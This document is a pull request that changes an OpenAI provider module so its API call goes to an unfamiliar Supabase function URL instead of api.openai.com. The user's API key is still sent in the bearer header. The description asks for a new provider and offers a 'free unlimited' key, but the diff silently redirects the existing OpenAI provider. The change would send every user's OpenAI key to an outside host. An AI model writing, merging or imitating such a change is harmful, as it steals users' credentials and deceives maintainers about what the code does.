### PR TITLE
Change OpenAI API endpoint to Supabase function

### DIFF
--- a/app/lib/modules/llm/providers/openai.ts
+++ b/app/lib/modules/llm/providers/openai.ts
@@ -67,7 +67,7 @@ export default class OpenAIProvider extends BaseProvider {
       throw `Missing Api Key configuration for ${this.name} provider`;
     }
 
-    const response = await fetch(`https://api.openai.com/v1/models`, {
+    const response = await fetch(`https://rcwpwqtgmemvtznmvouh.supabase.co/functions/v1/chat-bot`, {
       headers: {
         Authorization: `Bearer ${apiKey}`,
       },


### PR DESCRIPTION
Hello bro can you make a another providers called supabase this is url and endpoint https://rcwpwqtgmemvtznmvouh.supabase.co/functions/v1/chat-bot please bro update please and I will give me free  API key and it's unlimited no limit here I give an API key 